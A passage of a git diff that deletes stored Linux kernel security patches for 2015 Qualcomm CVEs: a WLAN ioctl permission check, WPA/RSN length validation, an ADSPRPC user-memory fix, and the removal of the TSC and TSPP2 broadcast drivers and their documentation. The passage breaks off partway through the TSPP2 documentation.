diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0012.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0012.patch
deleted file mode 100644
index 46f616ef..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0012.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 55bdc6d1c88a100dc4a71bf855b69db522c9b5b5 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Tue, 27 Oct 2015 13:29:21 -0700
-Subject: qcacld-2.0: Add privilege check for QCSAP_IOCTL_WOWL_CONFIG_PTRN
-
-By convention Wireless Extension SET ioctls are supposed to be
-assigned even ioctl numbers. But in our WLAN driver some SET ioctls
-were assigned odd numbers. This means the kernel will fail to check,
-for those particular SET ioctls, whether or not the user has the right
-permission to do SET operations. QCSAP_IOCTL_WOWL_CONFIG_PTRN is one
-such ioctl.
-
-Ideally we would renumber this ioctl to conform to the Wireless
-Extensions convention. Unfortunately we don't know what userspace
-applications have this ioctl number hard-coded. Hence, in the driver,
-before processing the QCSAP_IOCTL_WOWL_CONFIG_PTRN ioctl, make sure
-the user task has the right permission to execute the command.
-
-Change-Id: Id61c1ec8dbbe4bbec2b032e12ffcc6139bb78b14
-CRs-Fixed: 931127
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 9a96d5e..270f5e1 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -2525,6 +2525,12 @@ static __iw_softap_wowl_config_pattern(struct net_device *dev,
- hdd_adapter_t *pAdapter = (netdev_priv(dev));
- struct iw_point s_priv_data;
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
- {
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0013.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0013.patch
deleted file mode 100644
index 3fb62d56..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0013.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From fb9fb202c71547dba648c9b08d97645c6f42ca6e Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar
-Date: Wed, 28 Oct 2015 16:36:56 +0530
-Subject: qcacld 2.0: Validate WPA and RSN IE for valid length
-
-prima to qcacld-2.0 propagation
-
-Return failure to applications if genie ioctl is invoked to configure
-WPS/WPA/RSN IEs with arguments of improper length.
-
-Change-Id: I2e034ef9f2537922be35d46ce266e6b99dab7bb6
-CRs-Fixed: 931451
----
- CORE/HDD/src/wlan_hdd_wext.c | 34 +++++++++++++++++++++++++---------
- 1 file changed, 25 insertions(+), 9 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 28a280b..4349e6b 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -2613,8 +2613,8 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
- case IE_EID_VENDOR:
- if ((IE_LEN_SIZE+IE_EID_SIZE+IE_VENDOR_OUI_SIZE) > eLen) /* should have at least OUI */
- {
-- kfree(base_genie);
-- return -EINVAL;
-+ ret = -EINVAL;
-+ goto exit;
- }
-
- if (0 == memcmp(&genie[0], "\x00\x50\xf2\x04", 4))
-@@ -2628,8 +2628,8 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
- hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
- "Need bigger buffer space");
- VOS_ASSERT(0);
-- kfree(base_genie);
-- return -ENOMEM;
-+ ret = -EINVAL;
-+ goto exit;
- }
- // save to Additional IE ; it should be accumulated to handle WPS IE + other IE
- memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2);
-@@ -2638,6 +2638,14 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
- else if (0 == memcmp(&genie[0], "\x00\x50\xf2", 3))
- {
- hddLog (VOS_TRACE_LEVEL_INFO, "%s Set WPA IE (len %d)",__func__, eLen + 2);
-+ if ((eLen + 2) > (sizeof(pWextState->WPARSNIE)))
-+ {
-+ hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-+ "Need bigger buffer space");
-+ ret = -EINVAL;
-+ VOS_ASSERT(0);
-+ goto exit;
-+ }
- memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN );
- memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2));
- pWextState->roamProfile.pWPAReqIE = pWextState->WPARSNIE;
-@@ -2654,8 +2662,8 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
- hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
- "Need bigger buffer space");
- VOS_ASSERT(0);
-- kfree(base_genie);
-- return -ENOMEM;
-+ ret = -ENOMEM;
-+ goto exit;
- }
- // save to Additional IE ; it should be accumulated to handle WPS IE + other IE
- memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2);
-@@ -2664,6 +2672,14 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
- break;
- case DOT11F_EID_RSN:
- hddLog (LOG1, "%s Set RSN IE (len %d)",__func__, eLen+2);
-+ if ((eLen + 2) > (sizeof(pWextState->WPARSNIE)))
-+ {
-+ hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-+ "Need bigger buffer space");
-+ ret = -EINVAL;
-+ VOS_ASSERT(0);
-+ goto exit;
-+ }
- memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN );
- memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2));
- pWextState->roamProfile.pRSNReqIE = pWextState->WPARSNIE;
-@@ -2672,15 +2688,15 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
-
- default:
- hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, elementId);
-- kfree(base_genie);
-- return 0;
-+ goto exit;
- }
- genie += eLen;
- remLen -= eLen;
- }
-+exit:
- EXIT();
- kfree(base_genie);
-- return 0;
-+ return ret;
- }
-
- /**
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0572/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-0572/ANY/0001.patch
deleted file mode 100644
index 7682c495..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0572/ANY/0001.patch
+++ /dev/null
@@ -1,143 +0,0 @@
-From 34ad3d34fbff11b8e1210b9da0dac937fb956b61 Mon Sep 17 00:00:00 2001
-From: Sathish Ambley
-Date: Wed, 10 Jun 2015 00:39:41 -0700
-Subject: msm: ADSPRPC: Do not access user memory directly
-
-The buffers being passed in the invocation are copied from user
-memory into the context using copy_from_user. Lookup the buffer
-pointers from the context where it was copied rather than directly
-accessing it from the user memory.
-
-Change-Id: Ief5a840f17f6287ebd48b4ae52facaccb271fab8
-Signed-off-by: Sathish Ambley
----
- drivers/char/adsprpc.c | 27 ++++++++++++++-------------
- drivers/char/adsprpc_compat.c | 15 +++++++--------
- 2 files changed, 21 insertions(+), 21 deletions(-)
-
-diff --git a/drivers/char/adsprpc.c b/drivers/char/adsprpc.c
-index a3d0b7f..1eec274 100644
---- a/drivers/char/adsprpc.c
-+++ b/drivers/char/adsprpc.c
-@@ -652,8 +652,7 @@ static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd, uintptr_t va,
- static int fastrpc_mmap_create_physical(struct fastrpc_file *fl,
- struct fastrpc_ioctl_mmap *ud, struct fastrpc_mmap **ppmap);
-
--static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
-- remote_arg_t *upra)
-+static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
- {
- remote_arg64_t *rpra;
- remote_arg_t *lpra = ctx->lpra;
-@@ -793,9 +792,9 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- }
- inh = inbufs + outbufs;
- for (i = 0; i < REMOTE_SCALARS_INHANDLES(sc); i++) {
-- rpra[inh + i].buf.pv = ptr_to_uint64(upra[inh + i].buf.pv);
-- rpra[inh + i].buf.len = upra[inh + i].buf.len;
-- rpra[inh + i].h = upra[inh + i].h;
-+ rpra[inh + i].buf.pv = ptr_to_uint64(ctx->lpra[inh + i].buf.pv);
-+ rpra[inh + i].buf.len = ctx->lpra[inh + i].buf.len;
-+ rpra[inh + i].h = ctx->lpra[inh + i].h;
- }
- dmac_flush_range((char *)rpra, (char *)rpra + ctx->used);
- bail:
-@@ -807,7 +806,7 @@ static int put_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- {
- uint32_t sc = ctx->sc;
- remote_arg64_t *rpra = ctx->rpra;
-- int i, inbufs, outbufs, outh;
-+ int i, inbufs, outbufs, outh, num;
- int err = 0;
-
- inbufs = REMOTE_SCALARS_INBUFS(sc);
-@@ -815,7 +814,7 @@ static int put_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- for (i = inbufs; i < inbufs + outbufs; ++i) {
- if (!ctx->maps[i]) {
- K_COPY_TO_USER(err, kernel,
-- upra[i].buf.pv,
-+ ctx->lpra[i].buf.pv,
- uint64_to_ptr(rpra[i].buf.pv),
- rpra[i].buf.len);
- if (err)
-@@ -825,11 +824,13 @@ static int put_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- ctx->maps[i] = 0;
- }
- }
-- outh = inbufs + outbufs + REMOTE_SCALARS_INHANDLES(sc);
-- for (i = 0; i < REMOTE_SCALARS_OUTHANDLES(sc); i++) {
-- upra[outh + i].buf.pv = uint64_to_ptr(rpra[outh + i].buf.pv);
-- upra[outh + i].buf.len = rpra[outh + i].buf.len;
-- upra[outh + i].h = rpra[outh + i].h;
-+ num = REMOTE_SCALARS_OUTHANDLES(sc);
-+ if (num) {
-+ outh = inbufs + outbufs + REMOTE_SCALARS_INHANDLES(sc);
-+ K_COPY_TO_USER(err, kernel, &upra[outh], &ctx->lpra[outh],
-+ num * sizeof(*ctx->lpra));
-+ if (err)
-+ goto bail;
- }
- bail:
- return err;
-@@ -992,7 +993,7 @@ static int fastrpc_internal_invoke(struct fastrpc_file *fl, uint32_t mode,
- goto bail;
-
- if (REMOTE_SCALARS_LENGTH(ctx->sc)) {
-- VERIFY(err, 0 == get_args(kernel, ctx, invoke->pra));
-+ VERIFY(err, 0 == get_args(kernel, ctx));
- if (err)
- goto bail;
- }
-diff --git a/drivers/char/adsprpc_compat.c b/drivers/char/adsprpc_compat.c
-index 2956702..ee324dc 100644
---- a/drivers/char/adsprpc_compat.c
-+++ b/drivers/char/adsprpc_compat.c
-@@ -98,8 +98,9 @@ static int compat_get_fastrpc_ioctl_invoke(
- if (err)
- return -EFAULT;
-
-- inv->inv.pra = (union remote_arg *)(inv + 1);
-- err = put_user(sc, &inv->inv.sc);
-+ pra = (union remote_arg *)(inv + 1);
-+ err = put_user(pra, &inv->inv.pra);
-+ err |= put_user(sc, &inv->inv.sc);
- err |= get_user(u, &inv32->inv.handle);
- err |= put_user(u, &inv->inv.handle);
- err |= get_user(p, &inv32->inv.pra);
-@@ -107,12 +108,11 @@ static int compat_get_fastrpc_ioctl_invoke(
- return err;
-
- pra32 = compat_ptr(p);
-- pra = inv->inv.pra;
-+ pra = (union remote_arg *)(inv + 1);
- num = REMOTE_SCALARS_INBUFS(sc) + REMOTE_SCALARS_OUTBUFS(sc);
- for (j = 0; j < num; j++) {
- err |= get_user(p, &pra32[j].buf.pv);
-- pra[j].buf.pv = 0;
-- err |= put_user(p, (compat_uptr_t *)&pra[j].buf.pv);
-+ err |= put_user(p, (uintptr_t *)&pra[j].buf.pv);
- err |= get_user(s, &pra32[j].buf.len);
- err |= put_user(s, &pra[j].buf.len);
- }
-@@ -121,7 +121,7 @@ static int compat_get_fastrpc_ioctl_invoke(
- err |= put_user(u, &pra[num + j].h);
- }
-
-- inv->fds = NULL;
-+ err |= put_user(NULL, &inv->fds);
- if (cmd == COMPAT_FASTRPC_IOCTL_INVOKE_FD) {
- err |= get_user(p, &inv32->fds);
- err |= put_user(p, (compat_uptr_t *)&inv->fds);
-@@ -173,8 +173,7 @@ static int compat_get_fastrpc_ioctl_mmap(
- err |= get_user(u, &map32->flags);
- err |= put_user(u, &map->flags);
- err |= get_user(p, &map32->vaddrin);
-- map->vaddrin = NULL;
-- err |= put_user(p, (compat_uptr_t *)&map->vaddrin);
-+ err |= put_user(p, (uintptr_t *)&map->vaddrin);
- err |= get_user(s, &map32->size);
- err |= put_user(s, &map->size);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0573/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-0573/ANY/0001.patch
deleted file mode 100644
index 3af61d83..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0573/ANY/0001.patch
+++ /dev/null
@@ -1,12987 +0,0 @@ -From e20f20aaed6b6d2fd1667bad9be9ef35103a51df Mon Sep 17 00:00:00 2001 -From: Liron Kuch -Date: Sun, 6 Sep 2015 11:19:39 +0300 -Subject: msm: broadcast: Remove unused TSC and TSPP2 drivers - -TSC and TSPP2 were HW blocks in MPQ8092 target which is -no longer supported. Remove TSC and TSPP2 drivers to -eliminate unused code. - -Change-Id: Ibb55ae0d15b33ba5855bde69e78925d23def3c6b -Signed-off-by: Liron Kuch ---- - Documentation/arm/msm/tsc.txt | 398 -- - Documentation/arm/msm/tspp2.txt | 497 -- - drivers/media/platform/msm/broadcast/Makefile | 2 - - drivers/media/platform/msm/broadcast/tsc.c | 3450 ---------- - drivers/media/platform/msm/broadcast/tspp2.c | 8578 ------------------------- - 5 files changed, 12925 deletions(-) - delete mode 100644 Documentation/arm/msm/tsc.txt - delete mode 100644 Documentation/arm/msm/tspp2.txt - delete mode 100644 drivers/media/platform/msm/broadcast/tsc.c - delete mode 100644 drivers/media/platform/msm/broadcast/tspp2.c - -diff --git a/Documentation/arm/msm/tsc.txt b/Documentation/arm/msm/tsc.txt -deleted file mode 100644 -index 11e74a2..0000000 ---- a/Documentation/arm/msm/tsc.txt -+++ /dev/null -@@ -1,398 +0,0 @@ --Introduction --============ -- --TSC Driver -- --The TSC (Transport Stream Controller) is a hardware block used in products such --as smart TVs, Set-top boxes and digital media adapters, and is responsible for --two main functionalities: -- --1. Mux function: enabling the routing of MPEG-2 transport streams (TS) received --from terrestrial/cable/satelite in order to support the different topologies of --the end product, as it may be deployed in many different topologies. --In addition, the active topology may change according to various factors such as --broadcast technology and/or conditional access system. -- --2. CI function: acting as a common interface, complying with both PC Card and --CI/+ specifications. -- --The TSC driver has two different interfaces, one for each function. 
-- --Hardware description --==================== --The TSC HW contains the TSC core, and uses the VBIF unit (IOMMU) which is part --of the broadcast subsystem HW. -- --Mux function: --------------- --The TSC can receive transport streams from: --a. Two Transport Stream Interfaces (TSIFs) 0 or 1, connected to two external --demods or to external bridge. --b. One TSIF from an integrated demod. -- --The TSC can route TS from any of the above TSIFs to an external CICAM, using a --software configurable mux. --The TSC can route TS from any of the above TSIFs, and TS received from the CI --Conditional Access Mudule (CICAM) to two TSIF outputs (0 or 1), using two --software configurable muexes. --The CICAM input and outputs are also managed via two additional TSIFs: TSIF-out --to the CAM, and TSIF-in from the CAM. -- --CI function: -------------- --The common interface is composed of: --1. Card detection logic: the TSC notifies the SW of any change in the card --detection status (via HW interrupt). -- --2. Control interface used to send/receive the CI messages (APDUs), supporting --data transmission in two formats: --a. Single byte transactions: to/from the attribute memory space of the CAM and -- the command area of the CAM. --b. Buffer transactions: to/from the command area of the CAM, using a -- configurable buffer size of 1k bytes-64k bytes. This enables transferring -- large chunks of data between the CAM and applications. -- The data buffer resides in the external memory and the interface to the -- memory is done through BCSS VBIF. --The TSC uses PCMCIA interface to interact with the CAM. -- --The following diagram provides an overview of the TSC HW: --+-------------------------------------------------------------------------+ --| | --| +------------------------------+ | --| +-----------+ | TSC Core --. | | --| |Ext. 
TSIF 0+------------+------------>| \ | +-----------+ | --| +-----------+ | +-----|------------>|Mux)----->TSPP TSIF 0| | --| +-----------+ | | +--|------------>| / | +-----------+ | --| |Ext. TSIF 1+------| | | +->--' | | --| +-----------+ | | | | | --. | | --| | | | +----------|->| \ | +-----------+ | --| +-----------+ | +--|--|-+--------|->|Mux)----->TSPP TSIF 1| | --| |Int. TSIF +---------+--|-|-+------|->| / | +-----------+ | --| +-----------+ | | | | +->--' | | --| | | | | | | | --| | | | | | | | --| |+------+(v-v-v--) | +-----+| | --| ||Card | \ Mux / | |CI/+ +---Data-Interface--+ | --| ||detect| `---' | +----++| | | --| |+-^-^--+ | | | | | | --| +--|-|-------|-------|-------|-+ +------+----+ | --| | | | | | | VBIF | | --| | | +-----v--+ +--+----+ | | | | --| | | |TSIF-Out| |TSIF-In| | +-----------+ | --| | | +-----+--+ +--^----+ | | --| | | | | | | --| ++-+-------v-------+-------++ | --| | CICAM | | --| | | | --| +---------------------------+ | --+-------------------------------------------------------------------------+ -- --Software description --==================== --The TSC Linux kernel driver manages the TSC core. It is a standard Linux --platform device driver. It can be configured as a loadable or built-in kernel --module. The driver is supported only in platforms that contain the TSC HW. -- --The TSC driver uses ION driver to control the IOMMU and map user-allocated --buffers to the TSC IOMMU domain. -- --The driver provides an abstraction of the TSC HW functionality for user-space --clients via two separate interfaces: tsc_mux and tsc_ci. These interfaces may --be used by upper layers to utilize the TSC HW for routing the TS and supporting --the Common Interface specification. -- --Driver initialization ----------------------- --The driver's probe function is invoked if there is a matching device tree node. --The probe function gets the required memory resources (i.e., register address --spaces) and maps them to kernel space for the driver's use. 
--The probe function also requests the required IRQs, GPIOs and clocks, and gets --the TSC IOMMU domain. The probe function also disables the TSIFs input. --Finally, the function creates two character device drivers: "tsc_mux","tsc_ci". -- --See API description in interface section. -- --Data paths ------------- --The TSC does not process the TS data received from the TSIFs. It just manages --the routing of that data. -- --Control paths - Mux function ------------------------------ --Example for routing the TS from external demod TSIF 0 to the CAM, and from the --CAM to TSIF 1 of the TSPP: -- --struct tsc_route tsif_cam = {TSC_SOURCE_EXTERNAL0, TSC_DEST_CICAM}; --struct tsc_route cam_tspp = {TSC_SOURCE_CICAM, TSC_DEST_TSPP1}; --int mux_fd, ret; --enum tsc_source tsif0 = TSC_SOURCE_EXTERNAL0; --enum tsc_source cam = TSC_SOURCE_CICAM; -- --/* opening Mux char device */ --mux_fd = open("/dev/tsc_mux0"); -- --/* Configure the CAM mux to route TS from external demod TSIF 0: */ --ret = ioctl(mux_fd, TSC_CONFIG_ROUTE, &tsif_cam); -- --/* Configure the TSPP TSIF 1 mux to route TS from CAM: */ --ret = ioctl(mux_fd, TSC_CONFIG_ROUTE, &cam_tspp); -- --/* Enabling the external demod TSIF 0, and the CAM TSIF-in and TSIF-out */ --ret = ioctl(mux_fd, TSC_ENABLE_INPUT, &tsif0); --ret = ioctl(mux_fd, TSC_ENABLE_INPUT, &cam); -- --close(mux_fd); -- --Control paths - CI function ----------------------------- --Example for writing a buffer to the CAM command area: -- --Assumptions: --1. The user allocated a buffer using ION driver and wrote to that buffer. --Also, retrieved the ion fd of that buffer and saved it to: --int buffer_fd; --2. The user already performed buffer size negotiation with the CAM according to --CI/+ specification, and had set the CAM size register with the buffer size. This --size is saved to: int size; --3. The user decided about the time the user wants to wait for the data --transmission. 
--struct tsc_buffer_mode buff_params = {buffer_fd, size, timeout}; --int ret; -- --/* Perform a blocking write buffer transaction for at most timeout */ --ret = ioctl(fd, TSC_WRITE_CAM_BUFFER, &buff_params); --/* ret indicate whether the transaction succeeded */ -- --Example for SW reset to the CAM (according to CI/+ specification): --struct single_byte_mode cmd_params = {1, RS bit set, timeout}; --struct single_byte_mode stat_params = {1, not initialize, timeout}; --int ci_fd, ret; --u8 data; -- --/* opening CI char device */ --ci_fd = open("/dev/tsc_ci0"); -- --/* Setting the RS bit of the CAM command register */ --ret = ioctl(ci_fd, TSC_WRITE_CAM_IO, &cmd_params); -- --/* Polling the FR bit of the CAM status register */ --ret = ioctl(ci_fd, TSC_READ_CAM_IO, &stat_params); --data = stat_params.data; --while (data & FR_BIT_MASK) { -- ret = ioctl(ci_fd, TSC_READ_CAM_IO, &stat_params); -- data = stat_params.data; --} -- --close(ci_fd); -- --Design --====== --The TSC driver is a regular Linux platform driver designed to support the --TSC HW available on specific SoCs. -- --The driver provides two user-space APIs: tsc_mux that allows the client full --control over the configuration of the TS routing, and tsc_ci that enables the --client to implement the Common Interface in front of the CAM. It does so while --encapsulating HW implementation details that are not relevant to the clients. -- --The driver enforces HW restrictions and checks for input parameters --validity, providing a success or failure return value for each API function: --0 upon success or negative value on failure. Errno parameter is set to indicate --the failure reason. --However, the driver does not enforce any high-level policy with regard to the --correct use of the TSC HW for various use-cases. -- --Power Management --================ --The TSC driver prevents the CPU from sleeping while the HW is active by using --wakeup_source API. 
When there are no open devices the driver releases the wakeup --source. In a similar manner, the driver enables the HW clocks only when needed. -- --SMP/multi-core --============== --The driver uses a spinlock to protect accesses to its internal databases, --for synchronization between user control API and kernel interrupt handlers. -- --The driver uses a mutex for all the Mux operations to synchronize access to the --routing internal databases. The driver uses another mutex for all the CI --operations to synchronize data sent and received to and from the CAM. -- --Security --======== --Although the TSC is the bridge the external conditional access module, it has no --security aspects. Any protection which is needed is performed by the upper --layers. For example, the messages which are written to the CAM are encrypted. --Thus the TSC accesses only non-protected, HLOS accessible memory regions. -- --Performance --=========== --Control operations are not considered as performance critical. --Most of the control operations are assumed to be fairly uncommon. -- --Interface --========= --Kernel-space API ------------------ --The TSC driver does not provide any kernel-space API, only a user-space API. -- --User-space API ------------------ --Open: upper layer can open tsc_mux device and/or tsc_ci device. --Release: close the device and release all the allocated resources. --Poll: two different functions- one for Mux, one for CI. The Mux poll wait for --rate mismatch interrupt. The CI poll waits for card detection HW interrupt. --The rate mismatch interrupt is not cleared in the interrupt handler because it --will signal again all the time. Therefore it is cleared via a specific ioctl --that upper layer can use after the problem is solved. Additionally, the --interrupt is cleared when the card is removed. --ioctl: two functions, one for mux and one for ci. The ioctl are specified below. 
-- --TSC Mux - routing the TS: --------------------------- --enum tsc_source { -- TSC_SOURCE_EXTERNAL0, -- TSC_SOURCE_EXTERNAL1, -- TSC_SOURCE_INTERNAL, -- TSC_SOURCE_CICAM --}; --enum tsc_dest { -- TSC_DEST_TSPP0, -- TSC_DEST_TSPP1, -- TSC_DSET_CICAM --}; -- --struct tsc_route { -- enum tsc_source source; -- enum tsc_dest dest; --}; -- --#define TSC_CONFIG_ROUTE _IOW(TSC_IOCTL_BASE, 0, struct tsc_tspp_route) --#define TSC_ENABLE_INPUT _IOW(TSC_IOCTL_BASE, 1, enum tsc_source) --#define TSC_DISABLE_INPUT _IOW(TSC_IOCTL_BASE, 2, enum tsc_source) -- --These 3 IOCTLs control the 3 muxes that route the TS, and enable/disable the --TSIFs input. -- --TSC Mux - configuring the TSIFs: ---------------------------------- --enum tsc_data_type { -- TSC_DATA_TYPE_SERIAL, -- TSC_DATA_TYPE_PARALLEL --}; --enum tsc_receive_mode { -- TSC_RECEIVE_MODE_START_VALID, -- TSC_RECEIVE_MODE_START_ONLY, -- TSC_RECEIVE_MODE_VALID_ONLY --}; -- --struct tsc_tsif_params { -- enum tsc_source source; -- enum tsc_receive_mode receive_mode; -- enum tsc_data_type data_type; -- int clock_polarity; -- int data_polarity; -- int start_polarity; -- int valid_polarity; -- int error_polarity; -- int data_swap; -- int set_error; --}; -- --#define TSC_SET_TSIF_CONFIG _IOW(TSC_IOCTL_BASE, 3, struct tsc_tsif_params) -- --This IOCTL enables configuring a specific TSIF with all possible configurations. -- --TSC Mux - clearing rate mismatch interrupt -------------------------------------------- -- --#define TSC_CLEAR_RATE_MISMATCH_IRQ _IO(TSC_IOCTL_BASE, 4) -- --This IOCTL is used for clearing the interrupt, which is not done automatically --by the driver. 
--
--TSC CI - CAM configuration:
-----------------------------
--enum tsc_cam_personality {
-- TSC_CICAM_PERSONALITY_CI,
-- TSC_CICAM_PERSONALITY_CIPLUS,
-- TSC_CICAM_PERSONALITY_PCCARD,
-- TSC_CICAM_PERSONALITY_DISABLE
--};
--enum tsc_card_status {
-- TSC_CARD_STATUS_NOT_DETECTED,
-- TSC_CARD_STATUS_DETECTED,
-- TSC_CARD_STATUS_FAILURE
--};
--
--#define TSC_CICAM_SET_CLOCK _IOW(TSC_IOCTL_BASE, 5, int)
--This IOCTL sets the clock rate of the TS from the TSC to the CAM
--
--#define TSC_CAM_RESET _IO(TSC_IOCTL_BASE, 6)
--This IOCTL performs HW reset to the CAM
--
--#define TSC_CICAM_PERSONALITY_CHANGE \
-- _IOW(TSC_IOCTL_BASE, 7, enum tsc_cam_personality)
--This IOCTL configures the PCMCIA pins according to the specified card type.
--
--#define TSC_GET_CARD_STATUS _IOR(TSC_IOCTL_BASE, 8, enum tsc_card_status)
--This IOCTL queries the card detection pins and returns their status.
--
--TSC CI - Data transactions:
-----------------------------
--struct tsc_single_byte_mode {
-- u16 address;
-- u8 data;
-- int timeout; /* in msec */
--};
--struct tsc_buffer_mode {
-- int buffer_fd;
-- u16 buffer_size;
-- int timeout; /* in msec */
--};
--
--#define TSC_READ_CAM_MEMORY \
-- _IOWR(TSC_IOCTL_BASE, 9, struct tsc_single_byte_mode)
--#define TSC_WRITE_CAM_MEMORY \
-- _IOW(TSC_IOCTL_BASE, 10, struct tsc_single_byte_mode)
--#define TSC_READ_CAM_IO \
-- _IOWR(TSC_IOCTL_BASE, 11, struct tsc_single_byte_mode)
--#define TSC_WRITE_CAM_IO \
-- _IOW(TSC_IOCTL_BASE, 12, struct tsc_single_byte_mode)
--#define TSC_READ_CAM_BUFFER \
-- _IOWR(TSC_IOCTL_BASE, 13, struct tsc_buffer_mode)
--#define TSC_WRITE_CAM_BUFFER \
-- _IOW(TSC_IOCTL_BASE, 14, struct tsc_buffer_mode)
--
--These IOCTLs performs a read/write data transaction of the requested type.
--
--Driver parameters
--=================
--The TSC module receives one parameter:
--tsc_iommu_bypass - 0 for using the VBIF, 1 for not using it. Not using the VBIF
--is a debug configuration.
--
--Config options
--==============
--To enable the driver, set CONFIG_TSC to y (built-in) or m (kernel module)
--in the kernel configuration menu.
--
--Dependencies
--============
--The TSC driver uses the ION driver for IOMMU registration and buffer
--mapping to BCSS VBIF.
--
--User space utilities
--====================
--None.
--
--Other
--=====
--None.
--
--Known issues
--============
--None.
--
--To do
--=====
--None.
-diff --git a/Documentation/arm/msm/tspp2.txt b/Documentation/arm/msm/tspp2.txt
-deleted file mode 100644
-index 006c688..0000000
---- a/Documentation/arm/msm/tspp2.txt
-+++ /dev/null
-@@ -1,497 +0,0 @@
--Introduction
--============
--
--TSPP2 Driver
--
--The TSPP2 (Transport Stream Packet Processor v2) is a hardware accelerator
--designed to process MPEG-2 Transport Stream (TS) data. It can be used to
--process broadcast TV services. The TSPP2 HW processes the TS packets, offloads
--the host CPU and supports the real-time processing requirements of such
--services.
--
--TS data can be received either from TSIF (Transport Stream Interface) input
--or from memory input, to support playing live broadcasts as well as
--playback from memory. Recording is also supported.
--
--TSPP2 is a significantly different HW unit than the TSPP unit described in
--Documentation/arm/msm/tspp.txt. The functionality is enhanced and the HW
--design is different.
--
--Hardware description
--====================
--The TSPP2 HW contains the TSPP2 core, a BAM (Bus Access Manager, used for DMA
--operations) unit, and a VBIF unit (IOMMU).
--
--The TSPP2 HW supports:
--a. Up to two TSIF inputs and up to eight memory inputs.
--b. Various TS packet sizes (188/192 bytes) and formats (timestamp location).
--c. PID filtering.
--d. Raw transmit operation for section filtering or recording.
--e. Full PES and separated PES transmit operation for audio and video playback.
--f. Decryption and re-encryption operations for secure transport streams.
--g. PCR extraction.
--h.
Indexing - identifying patterns in video streams.
--
--The following diagram provides an overview of the TSPP2 HW:
--+------------------------------------------------------------------+
--| |
--| +-------------+ +--------------------+ |
--| | TSIF 0 +---> TSPP2 Core | |
--| +-------------+ | | |
--| | +---------------+ | |
--| +-------------+ | | | | |
--| | TSIF 1 +---> | Source 0 | | |
--| +-------------+ | | | | |
--| | | | | |
--| | | | | |
--| | | +------------+| | +--------------+ |
--| | | | Filter 0 +|---------> BAM pipe 3 | |
--| | | +------------+| | +--------------+ |
--| | | +------------+| | +--------------+ |
--| +-------------+ | | | Filter 1 +|---------> BAM pipe 4 | |
--| | BAM pipe 0 +---> | +------------+| | +--------------+ |
--| +-------------+ | | | | | |
--| +-------------+ | +---------------+ | +--------------+ |
--| | BAM pipe 1 +--->--------------------|----| | |
--| +-------------+ | | | VBIF | |
--| +-------------+ | | | IOMMU | |
--| | BAM pipe 2 +--->--------------------|----| | |
--| +-------------+ +--------------------+ +--------------+ |
--+------------------------------------------------------------------+
--
--A source is configured to have either a TSIF input (TSIF 0 or 1) or a
--memory input (a BAM pipe). One or more filters are attached to the source.
--Each filter has a 13-bit PID and mask values to perform the PID filtering.
--Additionally, one or more operations are added to each filter to achieve the
--required functionality. Each operation has specific parameters. The operation's
--output is usually placed in an output pipe.
--
--The TSPP HW uses its own virtual address space, mapping memory buffer addresses
--using the VBIF IOMMU.
--
--Software description
--====================
--The TSPP2 Linux kernel driver manages the TSPP2 core. The TSPP2 driver utilizes
